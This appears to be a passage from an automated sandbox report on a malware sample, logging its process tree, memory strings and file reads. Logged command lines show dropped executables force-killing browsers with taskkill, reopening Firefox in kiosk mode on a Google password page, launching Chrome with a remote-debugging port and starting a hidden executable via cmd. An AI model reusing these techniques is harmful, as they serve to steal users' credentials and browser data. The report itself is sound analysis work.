                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: a78a39a396.exe, 0000000A.00000002.3254524203.000000001DDF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: a78a39a396.exe, 0000000A.00000002.3254524203.000000001DDF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: a78a39a396.exe, 0000000A.00000002.3254524203.000000001DDF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: a78a39a396.exe, 0000000A.00000002.3254524203.000000001DDF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: a78a39a396.exe, 0000000A.00000002.3254524203.000000001DDF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                          Source: a78a39a396.exe, 0000000A.00000002.3254524203.000000001DDF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                          Source: a78a39a396.exe, 0000000A.00000002.3254524203.000000001DDF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: 7b9f3f6834.exe, 00000009.00000003.2647351342.0000000005DF4000.00000004.00000800.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000003.2905176442.000000001DCF9000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2809757310.0000000005E8A000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811496040.0000000005E6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: a78a39a396.exe, 0000000A.00000002.3254524203.000000001DDF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                          Source: a78a39a396.exe, 0000000A.00000002.3254524203.000000001DDF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                          Source: file.exeReversingLabs: Detection: 50%
                          Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: 7b9f3f6834.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: a78a39a396.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe "C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe "C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe "C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe "C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exe "C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2184,i,15586406889969502989,18205548253034486808,262144 /prefetch:8
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2328 -parentBuildID 20230927232528 -prefsHandle 2264 -prefMapHandle 2252 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7b3756fb-4aa1-46df-9da2-bcc6763b1cc6} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" 18d64e69710 socket
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe "C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe"
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5312 --field-trial-handle=2184,i,15586406889969502989,18205548253034486808,262144 /prefetch:8
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exe "C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exe"
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4048 -parentBuildID 20230927232528 -prefsHandle 3536 -prefMapHandle 3496 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7e1a0ebf-e3e0-4aec-9a10-549fec5c1c42} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" 18d76f36510 rdd
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2528 --field-trial-handle=2484,i,13421121324074571996,40061508320262685,262144 /prefetch:8
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exe "C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2284 -parentBuildID 20230927232528 -prefsHandle 2228 -prefMapHandle 2212 -prefsLen 25416 -prefMapSize 238769 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e81363d9-7002-41a3-97be-ba7e9e1c74cc} 5040 "\\.\pipe\gecko-crash-server-pipe.5040" 1e565770310 socket
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exe "C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe "C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsCFCGIIEHIE.exe"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\DocumentsCFCGIIEHIE.exe "C:\Users\user\DocumentsCFCGIIEHIE.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe "C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=7b9f3f6834.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1984,i,15563652493800643433,5868694598429771387,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=7b9f3f6834.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe "C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe "C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe "C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exe "C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exe "C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsCFCGIIEHIE.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=7b9f3f6834.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=7b9f3f6834.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2184,i,15586406889969502989,18205548253034486808,262144 /prefetch:8
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5312 --field-trial-handle=2184,i,15586406889969502989,18205548253034486808,262144 /prefetch:8
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2328 -parentBuildID 20230927232528 -prefsHandle 2264 -prefMapHandle 2252 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7b3756fb-4aa1-46df-9da2-bcc6763b1cc6} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" 18d64e69710 socket
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4048 -parentBuildID 20230927232528 -prefsHandle 3536 -prefMapHandle 3496 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7e1a0ebf-e3e0-4aec-9a10-549fec5c1c42} 3176 "\\.\pipe\gecko-crash-server-pipe.3176" 18d76f36510 rdd
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2528 --field-trial-handle=2484,i,13421121324074571996,40061508320262685,262144 /prefetch:8
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2284 -parentBuildID 20230927232528 -prefsHandle 2228 -prefMapHandle 2212 -prefsLen 25416 -prefMapSize 238769 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e81363d9-7002-41a3-97be-ba7e9e1c74cc} 5040 "\\.\pipe\gecko-crash-server-pipe.5040" 1e565770310 socket
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess created: unknown unknown
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\DocumentsCFCGIIEHIE.exe "C:\Users\user\DocumentsCFCGIIEHIE.exe"
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1984,i,15563652493800643433,5868694598429771387,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
